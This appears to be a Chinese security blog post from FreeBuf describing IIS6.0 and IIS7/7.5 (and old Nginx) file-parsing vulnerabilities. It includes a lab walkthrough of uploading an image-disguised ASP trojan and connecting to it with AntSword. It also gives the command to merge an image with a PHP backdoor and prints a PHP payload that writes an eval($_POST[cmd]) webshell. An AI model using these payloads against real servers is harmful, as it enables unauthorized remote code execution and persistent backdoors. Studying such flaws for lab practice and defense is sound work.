freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

IIS的两个解析漏洞
2021-08-13 10:01:41

IIS 的解析漏洞

IIS6.0解析漏洞:

在网站下建立文件夹的名字为 .asp、.asa 的文件夹,其目录内的任何扩展名的文件都被 IIS 当作 asp 文件来解析并执行。例如创建目录 vidun.asp,那么 /vidun.asp/1.jpg 将被当作 asp 文件来执行。

IIS6.0解析漏洞复现过程:

用到的工具 burpsuite 中国蚁剑 一个一句话asp木马文件

墨者学院提供的靶场 (https://www.mozhe.cn/bug/detail/Umc0Sm5NMnkzbHM0cFl2UlVRenA1UT09bW96aGUmozhe)

首先进入环境
图片.png

通过wappalyzer插件我们可以看到 是IIS6.0 ,

先试着上传了一个jpg 文件 成功上传了
图片.png

通过返回地址我们知道了上传的文件被保存在了upload目录下

用PKer扫一下后台目录,发现upload目录在根目录下
图片.png

上传一个一句话asp图片马(iis6.jpg) 用bp抓包
图片.png

根据返回的地址用蚁剑连接
图片.png

连接成功
图片.png

IIS 7.0/IIS 7.5/Nginx <=0.8.37 解析漏洞

IIS7/7.5在Fast-CGI运行模式下,在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg/xx.php 解析为 php 文件。

常用利用方法:

将一张图片和一个写入后门代码的文本文件合并将恶意文本写入图片的二进制代码之后,避免破坏图片文件头和尾,然后在同一个目录下放一个正常的jpg文件(xx.jpg) 和一个php木马文件(yy.txt),然后进入cmd命令行,进入这两个文件所在目录,运行命令

copy xx.jpg/b + yy.txt/a xy.jpg

然后就会生成一个新的图片文件 (xy.jpg),上传这个xy.jpg ,在xy.jpg 的地址后加上 /xx.php 即可执行恶意文本(yy.txt里的内容)。然后就会在xy.jpg所在的目录生成shell.php文件。

注意:

/b 即二进制[binary]模式

/a 即ascii模式

xx.jpg正常图片文件

yy.txt 内容

<?PHPfputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>

意思为写入一个内容为

<?php eval($_POST[cmd])?>

名称为shell.php的文件,然后我们通过蚁剑连接即可。

# web安全 # iis漏洞
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录